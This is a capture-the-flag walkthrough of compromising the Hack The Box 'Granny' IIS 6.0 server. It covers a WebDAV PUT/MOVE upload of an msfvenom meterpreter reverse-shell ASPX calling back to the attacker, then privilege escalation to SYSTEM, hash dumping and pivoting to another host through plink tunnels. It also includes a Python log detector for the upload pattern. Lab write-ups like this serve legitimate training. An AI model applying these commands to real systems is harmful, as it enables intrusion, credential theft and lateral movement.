Hack the Box Challenge: Granny Write-up

Hello, today we are going to solve another hackthebox.eu platform challenge, “Granny”. This write-up is for those who want to increase their skills in penetration testing and black-box testing. So, let's get started.
OS: Windows, IP: 10.10.10.15

Enumeration:

We begin with an nmap scan, which reveals that HTTP port 80/tcp is open and running Microsoft IIS httpd 6.0.



Browsing to the IP results in a web page that yields nothing. The source code has nothing remarkable either.



Since the nmap results stated that the PUT method is allowed and the WebDAV type is unknown, we run davtest like so: davtest -url http://10.10.10.15. The WebDAV enumeration shows that some PUTs succeeded for the html and txt extensions.



To find out what davtest is doing, we fire up Burp, bind it to port 80 and redirect request handling to 10.10.10.15 on port 80. We then run davtest against localhost (davtest -url http://localhost). The HTTP history in Burp shows us what davtest is doing, and we send the request to Repeater to test it.



Exploitation:

We PUT fresec.html and see that the file is created. When we go to http://10.10.10.15/fresec.html, we see the output "this is a test". This shows that we can upload our backdoor. We also see that the site is powered by ASP.NET, so this is the file extension that will be executed.





We use msfvenom to create our reverse shell (msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=1337 -f aspx) and start msfconsole to run our handler:

use exploit/multi/handler
set LHOST 10.10.14.20
set LPORT 1337
set payload windows/meterpreter/reverse_tcp
exploit -j



Next, copy the payload into Burp and change the file extension from html to aspx.



Upon uploading our payload via Burp, the request is denied, because the .aspx extension is executable, unlike html. Googling the MOVE method as a way to get our aspx file executed shows that it moves a file to a destination, as in the example below:

MOVE /pictures/lion.html HTTP/1.1
Destination: /pictures/lion.aspx
Host: webdav.yandex.ru



We click Go, browse to http://10.10.10.15/fresec.aspx and see no 404 error. When we check our handler, a session has opened!
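The upload-then-rename sequence above leaves a recognisable trace on the server side. As an added detection example (not code from the original write-up), the following Python correlates a successful PUT with a subsequent MOVE of the same path from the same client in IIS W3C log lines; the log lines are constructed, and the default field layout does not record the MOVE Destination header, so the rule keys on client IP, path and timing rather than on the new extension.

```python
# Added detection example, not code from the original write-up. The IIS W3C
# log lines are constructed to mirror the PUT -> MOVE sequence above; the
# default field layout does not log the MOVE Destination header, so the rule
# correlates on client IP, path and timing rather than on the new extension.
from datetime import datetime

WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}

CONSTRUCTED_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-01-01 10:00:01 10.10.10.15 GET / - 80 - 10.10.14.20 Mozilla/5.0 200 0 0
2020-01-01 10:00:05 10.10.10.15 OPTIONS / - 80 - 10.10.14.20 DAV-Test 200 0 0
2020-01-01 10:00:09 10.10.10.15 PUT /fresec.html - 80 - 10.10.14.20 Mozilla/5.0 201 0 0
2020-01-01 10:00:15 10.10.10.15 PUT /fresec.aspx - 80 - 10.10.14.20 Mozilla/5.0 403 0 0
2020-01-01 10:00:20 10.10.10.15 MOVE /fresec.html - 80 - 10.10.14.20 Mozilla/5.0 201 0 0
2020-01-01 10:00:25 10.10.10.15 GET /fresec.aspx - 80 - 10.10.14.20 Mozilla/5.0 200 0 0
2020-01-01 11:30:00 10.10.10.15 GET /index.html - 80 - 10.10.14.99 Mozilla/5.0 200 0 0
"""

def parse_w3c(text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def write_method_events(rows):
    """Every WebDAV write-method request, denied ones included: the 403 on
    PUT /x.aspx is the probe that precedes the upload-then-rename trick."""
    return [(r["cs-method"], r["cs-uri-stem"], int(r["sc-status"]))
            for r in rows if r["cs-method"] in WRITE_METHODS]

def find_put_then_move(rows, window_seconds=300):
    """Flag a successful (2xx) PUT followed within window_seconds by a MOVE of
    the same path from the same client IP."""
    last_put, findings = {}, []
    for r in rows:
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        key = (r["c-ip"], r["cs-uri-stem"])
        if r["cs-method"] == "PUT" and r["sc-status"].startswith("2"):
            last_put[key] = ts
        elif r["cs-method"] == "MOVE" and key in last_put:
            age = (ts - last_put[key]).total_seconds()
            if age <= window_seconds:
                findings.append({"client": key[0], "path": key[1], "seconds": int(age)})
    return findings
```

On a server that is not meant to accept uploads, any hit from write_method_events is worth an alert on its own; find_put_then_move narrows that to the rename pattern used here.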



Next, we use post/multi/recon/local_exploit_suggester, set session 1 and run it to gather potential local exploits for this box.



If the meterpreter session dies, use the following post-exploitation module to migrate the current process into another process:

use post/windows/manage/migrate
msf post(windows/manage/migrate)> set session 1
msf post(windows/manage/migrate)> run

The exploit suggester lists a couple of exploits; for privilege escalation I chose the pprFlattenRec Local Privilege Escalation module (the last one). Set LHOST to your tun0/eth0 address, whichever applies, if you run into issues with the module loading a different IP. We correct that and get the SYSTEM shell :)



Running the netstat -an command, we see localhost listening on a different port. Next, we port forward to it:

portfwd -h
portfwd add -l 445 -p 445 -r 127.0.0.1

We can then bypass the firewall by running nmap -p 445 -n -sC localhost from our Kali box. We also do a hashdump and grab a couple of hashes for offline cracking.


Pivoting:

On your Kali box, locate plink, which is part of PuTTY, at /usr/share/windows-binaries/plink.exe. It establishes an SSH tunnel back to us. In your meterpreter shell, check the directories and cd to inetpub, as we can write to it, then cd to wwwroot. Next, upload plink with meterpreter's upload command from the path it is saved to: upload /root/htb/granny/plink.exe



Add a new user fresec and, in your /etc/passwd file, give the user /bin/false as its shell, since you don't want the new user to execute commands:

fresec:x:1001:1001::/home/fresec:/bin/false

You can change the password for this new user to password. Restart the SSH service (service ssh restart) on your Kali box; you can check that it is listening with netstat -alnp | grep 22 | grep LIST. Next, run the shell command to open a shell in meterpreter and forward your connection to 10.10.14.20 (us on Kali) on port 8000, telling plink not to execute any commands once the connection is established (-N):

plink.exe -l fresec -pw password -L 10.10.10.15:8000:10.10.14.20:8000 -N 10.10.14.20

On Kali, start a listener on port 8000 and, in a separate Kali shell, run nc 10.10.10.15 8000 to connect to Granny; getting a connection verifies that the port forward works. Background the session with Ctrl+Z and then add a route with the command route add 10.10.10.14 255.255.255.255 1 (.14 is Grandpa's IP and 1 is session 1). Then:

show options
set LHOST 10.10.10.15 (Granny's IP)
set LPORT 8000
set RHOST 10.10.10.15 (Grandpa's)
run
shell
ipconfig (to verify you are on 10.10.10.14)
